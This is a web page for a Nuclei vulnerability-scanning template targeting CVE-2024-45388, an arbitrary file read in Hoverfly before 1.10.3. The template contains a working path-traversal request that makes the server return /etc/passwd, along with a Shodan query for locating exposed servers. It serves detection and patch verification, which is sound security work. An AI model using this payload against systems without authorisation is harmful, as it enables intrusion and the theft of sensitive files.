Hoverfly < 1.10.3 - Arbitrary File Read
ID: CVE-2024-45388
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,hoverfly,lfi,intrusive
Description
Section titled “Description”Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
YAML Source
Section titled “YAML Source”id: CVE-2024-45388
info: name: Hoverfly < 1.10.3 - Arbitrary File Read author: iamnoooob,rootxharsh,pdresearch severity: high description: | Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. reference: - https://github.com/advisories/GHSA-6xx4-x46f-f897 - https://nvd.nist.gov/vuln/detail/CVE-2024-45388 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-45388 cwe-id: CWE-20 metadata: max-request: 1 verified: true shodan-query: http.favicon.hash:1357234275 tags: cve,cve2024,hoverfly,lfi,intrusive
http: - raw: - | PUT /api/v2/simulation HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - 'hoverflyVersion' condition: and
- type: word part: header words: - application/json
- type: status status: - 200# digest: 490a004630440220148abae40b475f8412592cc34997df7ae0195379f89ecb377252e56cb6bbd117022018f7474bceeaf995210f93b5f3c23e9f0be3809f855899eabb03abdfef50c21a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-45388.yaml"